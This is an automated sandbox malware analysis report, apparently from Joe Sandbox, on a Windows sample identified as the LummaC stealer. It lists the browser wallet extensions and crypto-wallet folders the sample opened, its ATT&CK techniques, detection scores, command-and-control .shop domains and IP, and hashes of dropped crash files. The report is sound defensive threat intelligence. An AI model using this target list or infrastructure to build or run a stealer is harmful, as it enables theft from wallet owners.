            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Tries to steal Crypto Currency Wallets
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeDirectory queried: C:\Users\user\Documents\DTBZGIOOSOJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
            Source: C:\Users\user\Desktop\5Dw2hTQmiB.exeDirectory queried: C:\Users\user\Documents\XZXHAVGRAGJump to behavior
            Source: Yara matchFile source: Process Memory Space: 5Dw2hTQmiB.exe PID: 6988, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: 5Dw2hTQmiB.exe PID: 6988, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            Process Injection            		11
            Virtualization/Sandbox Evasion            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		21
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            PowerShell            		Boot or Logon Initialization Scripts1
            DLL Side-Loading            		1
            Process Injection            		LSASS Memory11
            Virtualization/Sandbox Evasion            		Remote Desktop Protocol31
            Data from Local System            		2
            Non-Application Layer Protocol            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
            Deobfuscate/Decode Files or Information            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares2
            Clipboard Data            		113
            Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
            Obfuscated Files or Information            		NTDS1
            File and Directory Discovery            		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Software Packing            		LSA Secrets12
            System Information Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            5Dw2hTQmiB.exe44%VirustotalBrowse
            5Dw2hTQmiB.exe34%ReversingLabs
            5Dw2hTQmiB.exe100%AviraHEUR/AGEN.1318266
            5Dw2hTQmiB.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            exceptionwillapews.shop11%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi0%URL Reputationsafe
            http://x1.c.lencr.org/00%URL Reputationsafe
            http://x1.i.lencr.org/00%URL Reputationsafe
            https://support.microsof0%URL Reputationsafe
            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
            bordersoarmanusjuw.shop2%VirustotalBrowse
            economicscreateojsu.shop13%VirustotalBrowse
            exceptionwillapews.shop11%VirustotalBrowse
            wifeplasterbakewis.shop2%VirustotalBrowse
            pushjellysingeywus.shop2%VirustotalBrowse
            suitcaseacanehalk.shop2%VirustotalBrowse
            entitlementappwo.shop17%VirustotalBrowse
            https://exceptionwillapews.shop/12%VirustotalBrowse
            https://exceptionwillapews.shop/api13%VirustotalBrowse
            mealplayerpreceodsju.shop18%VirustotalBrowse
            absentconvicsjawun.shop2%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            exceptionwillapews.shop
            		104.21.44.10
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            pushjellysingeywus.shoptrueunknown
            bordersoarmanusjuw.shoptrueunknown
            economicscreateojsu.shoptrueunknown
            wifeplasterbakewis.shoptrueunknown
            exceptionwillapews.shoptrueunknown
            suitcaseacanehalk.shoptrueunknown
            entitlementappwo.shoptrueunknown
            https://exceptionwillapews.shop/apitrueunknown
            mealplayerpreceodsju.shoptrueunknown
            absentconvicsjawun.shoptrueunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtab5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://duckduckgo.com/ac/?q=5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg5Dw2hTQmiB.exe, 00000000.00000003.1682521833.0000000003083000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  https://www.google.com/images/branding/product/ico/googleg_lodp.ico5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.5Dw2hTQmiB.exe, 00000000.00000003.1682521833.0000000003083000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      https://exceptionwillapews.shop/sm5Dw2hTQmiB.exe, 00000000.00000002.1857457436.000000000306C000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://exceptionwillapews.shop/apiM5Dw2hTQmiB.exe, 00000000.00000002.1857457436.000000000306C000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://crl.rootca1.amazontrust.com/rootca1.crl05Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://upx.sf.netAmcache.hve.3.drfalse
                              		high
                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.rootca1.amazontrust.com0:5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20165Dw2hTQmiB.exe, 00000000.00000003.1663210788.000000000547C000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e175Dw2hTQmiB.exe, 00000000.00000003.1663210788.000000000547C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://www.ecosia.org/newtab/5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br5Dw2hTQmiB.exe, 00000000.00000003.1682178113.000000000554A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://exceptionwillapews.shop/kdh5Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://ac.ecosia.org/autocomplete?q=5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://exceptionwillapews.shop/25Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://exceptionwillapews.shop/RR5Dw2hTQmiB.exe, 00000000.00000002.1857457436.0000000003006000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg5Dw2hTQmiB.exe, 00000000.00000003.1682521833.0000000003083000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi5Dw2hTQmiB.exe, 00000000.00000003.1682521833.0000000003083000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://x1.c.lencr.org/05Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://x1.i.lencr.org/05Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://support.microsof5Dw2hTQmiB.exe, 00000000.00000003.1663210788.000000000547E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?5Dw2hTQmiB.exe, 00000000.00000003.1681160190.0000000005436000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://exceptionwillapews.shop/s5Dw2hTQmiB.exe, 00000000.00000002.1857457436.000000000306C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://exceptionwillapews.shop/apiO5Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://exceptionwillapews.shop/5Dw2hTQmiB.exe, 00000000.00000002.1857457436.0000000002FCF000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                          https://support.mozilla.org/products/firefoxgro.all5Dw2hTQmiB.exe, 00000000.00000003.1682178113.000000000554A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://exceptionwillapews.shop/api%5Dw2hTQmiB.exe, 00000000.00000003.1672129277.0000000003075000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=5Dw2hTQmiB.exe, 00000000.00000003.1663701289.000000000544F000.00000004.00000800.00020000.00000000.sdmp, 5Dw2hTQmiB.exe, 00000000.00000003.1663787239.0000000005438000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                104.21.44.10
                                                                		exceptionwillapews.shopUnited States
                                                                		13335CLOUDFLARENETUStrue

                                                                General Information

                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                Analysis ID:1427868
                                                                Start date and time:2024-04-18 09:31:19 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 15s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:8
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:5Dw2hTQmiB.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:017adc7dfb6b77dd2c14f7f7a4933f1c.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.evad.winEXE@2/5@1/1
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 94%
                                                                • Number of executed functions: 33
                                                                • Number of non-executed functions: 109
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 20.189.173.21
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                                • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                Simulations

                                                                Behavior and APIs

                                                                TimeTypeDescription
                                                                09:32:08API Interceptor8x Sleep call for process: 5Dw2hTQmiB.exe modified
                                                                09:32:28API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                Joe Sandbox View / Context

                                                                IPs

                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                104.21.44.10file.exeGet hashmaliciousLummaCBrowse
                                                                  dO2yPL2sJl.exeGet hashmaliciousLummaCBrowse
                                                                    SecuriteInfo.com.Win32.PWSX-gen.3511.2089.exeGet hashmaliciousLummaCBrowse

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      exceptionwillapews.shopfile.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.44.10
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.192.201
                                                                      dO2yPL2sJl.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.44.10
                                                                      SecuriteInfo.com.Win32.PWSX-gen.3511.2089.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.44.10
                                                                      hdx3EobVsY.exeGet hashmaliciousLummaCBrowse
                                                                      • 172.67.192.201

                                                                      ASNs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      CLOUDFLARENETUSPurchase Order PDF.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.13.205
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.44.10
                                                                      Leoch-Purchase Order.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 172.67.74.152
                                                                      p silp AI240190.pdf.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.12.205
                                                                      https://ortelia.com/Downloads/Curator/CuratorSetup.exeGet hashmaliciousHavocBrowse
                                                                      • 1.1.1.1
                                                                      https://app.esign.docusign.com/e/er?utm_campaign=GBL_XX_DBU_NEW_2307_FreetoTrialUnlock_Email1AU&utm_medium=email&utm_source=Eloqua&elqCampaignId=29542&s=566810826&lid=32871&elqTrackId=1034fb987fd44c9a9a4d0833ff06a55d&elq=89d72859fe264966a0176d4309dbb1a6&elqaid=60251&elqat=1Get hashmaliciousUnknownBrowse
                                                                      • 172.64.151.101
                                                                      https://ortelia.com/download-ortelia-curator/Get hashmaliciousHavocBrowse
                                                                      • 1.1.1.1
                                                                      SecuriteInfo.com.Win32.PWSX-gen.1728.1300.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 104.26.12.205
                                                                      SecuriteInfo.com.Heur.15333.25205.exeGet hashmaliciousAgentTeslaBrowse
                                                                      • 172.67.74.152
                                                                      MY69DoYgp5.elfGet hashmaliciousMiraiBrowse
                                                                      • 1.15.80.127

                                                                      JA3 Fingerprints

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1Quotation 20241804.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                      • 104.21.44.10
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.44.10
                                                                      ORDER-CONFIRMATION-DETAILS-000235374564.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog Stealer, RedLineBrowse
                                                                      • 104.21.44.10
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.44.10
                                                                      payload.jsGet hashmaliciousUnknownBrowse
                                                                      • 104.21.44.10
                                                                      payload.jsGet hashmaliciousUnknownBrowse
                                                                      • 104.21.44.10
                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                      • 104.21.44.10
                                                                      SecuriteInfo.com.Win32.RATX-gen.12024.12837.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                      • 104.21.44.10
                                                                      forcedelctl.dllGet hashmaliciousUnknownBrowse
                                                                      • 104.21.44.10
                                                                      Q73YlTAmWe.exeGet hashmaliciousRisePro StealerBrowse
                                                                      • 104.21.44.10

                                                                      Dropped Files

                                                                      No context

                                                                      Created / dropped Files

                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_5Dw2hTQmiB.exe_f9589b50e1a4a5348722d7f4bf92a1dd5f324c_ae7bb326_5ec02e5e-f042-4993-94d7-6d268217831f\Report.wer

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):0.993340172674728
                                                                      Encrypted:false
                                                                      SSDEEP:192:bttoXFilavWvs01eOcjs6FPzuiFvZ24IO8v:cilauf1eOcjVzuiFvY4IO8v
                                                                      MD5:05D4F2BF51FE617FB8CA13B234EA122F
                                                                      SHA1:E3D9C6B70D3A927463B423AC5CB0416C4CB5F111
                                                                      SHA-256:BAE07CD56E4F1091CE0F12BC20544B37DA01463DAD4AF895A560CABE50B35FD9
                                                                      SHA-512:7B47D99D9EDF2FCFFD6FD64BEE1683939E2F637757C1854648A9833E09EE4C8121B45F0105412A1045A25A62CD4895C3581AF7921C102E6D5989AC13BDFF30D0
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.7.8.9.9.1.3.6.8.2.2.1.7.3.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.7.8.9.9.1.3.7.4.7.8.4.2.1.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.c.0.2.e.5.e.-.f.0.4.2.-.4.9.9.3.-.9.4.d.7.-.6.d.2.6.8.2.1.7.8.3.1.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.e.8.1.2.3.b.f.-.8.d.4.0.-.4.e.3.4.-.9.c.9.4.-.6.0.b.6.7.9.f.6.3.f.8.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.5.D.w.2.h.T.Q.m.i.B...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.4.c.-.0.0.0.1.-.0.0.1.4.-.3.6.8.f.-.e.2.8.3.6.2.9.1.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.9.1.d.c.c.d.2.d.4.d.c.4.a.f.b.3.5.9.1.0.d.2.a.0.e.a.7.d.7.d.0.0.0.0.f.f.f.f.!.0.0.0.0.1.0.3.8.a.a.1.5.3.b.f.c.7.e.2.9.f.f.e.a.5.6.b.1.3.f.2.4.e.6.f.9.8.d.7.4.1.3.d.2.!.5.D.w.2.h.T.Q.m.i.B...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERA8B4.tmp.dmp

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 15 streams, Thu Apr 18 07:32:17 2024, 0x1205a4 type
                                                                      Category:dropped
                                                                      Size (bytes):48282
                                                                      Entropy (8bit):2.7185011171529068
                                                                      Encrypted:false
                                                                      SSDEEP:192:E8ZzsX4UxvyY8/+0ObB0c4+FMV4iAjChSeV0TZHUaeJV2mwDO3:Nlsvb8ebB0c48MRAgVYOaIYmwS
                                                                      MD5:E52E0F10F6CC628ABF707DAEBE734BDC
                                                                      SHA1:CEC773FDA2647C7C16B031431B67F418CFF3641C
                                                                      SHA-256:0FB75FE7FDF53A2AF0BD94CE993A650CEFD9F7C60338AA60EDB2579925F56305
                                                                      SHA-512:2D53E21390B5272A61F189118F15B40076B114B32830CDDDBA949808DF5445FEBA592A99B4C41B26E1970E1C9136694751F36365A14C8194FBC46FAF34990891
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:MDMP..a..... ......... f............4...............H........................1..........`.......8...........T...........x=.."...........x ..........d"..............................................................................eJ......."......GenuineIntel............T.......L...v. f.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAA5A.tmp.WERInternalMetadata.xml

                                                                      Download File
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8330
                                                                      Entropy (8bit):3.699037868263828
                                                                      Encrypted:false
                                                                      SSDEEP:192:R6l7wVeJRjL6P6Y9ZSU9kB6ZgmfYq4pDT89b7LsfpsJm:R6lXJVL6P6YTSU9kagmfYqx7QfR
                                                                      MD5:113E7B138A8E70ADE0BE346CAC91DB33
                                                                      SHA1:EB57CF8579F30034CBEA90EE9665194325B409DA
                                                                      SHA-256:191EDEA69EDCF81C0733652CF8B622374C5E6D4B3FF890DA1CBCC0E3C827D6EB
                                                                      SHA-512:5A4AB9E53FB1E1146D96F30BEC4DC561515313D56432B5697565A9F6A434B3629754AF94842160C63C197C9F1A9B7C6FA90732DDD1E6B65FD526ADE981677B06
